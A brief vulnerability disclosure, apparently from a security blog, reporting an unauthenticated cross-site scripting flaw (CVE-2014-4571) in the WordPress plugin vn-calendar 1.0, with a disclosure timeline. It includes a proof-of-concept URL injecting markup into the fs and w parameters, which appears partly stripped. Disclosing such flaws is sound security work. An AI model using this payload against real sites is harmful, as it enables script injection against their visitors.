wp-plugin : vn-calendar – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : vn-calendar

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/vn-calendar/vncal.js.php?cs=cs&fs=fs’>// &ts=ts&w=w’>// &

 

Vulnerable Parameter : fs,w

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-15

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4571

 
Plugin Description :
 
This plugin allows you to add a simple VN calendar(lunar calendar) to widget.
You can see Can Chi days, Hoang Dao hours... in VN calendar

Leave a Reply

Your email address will not be published. Required fields are marked *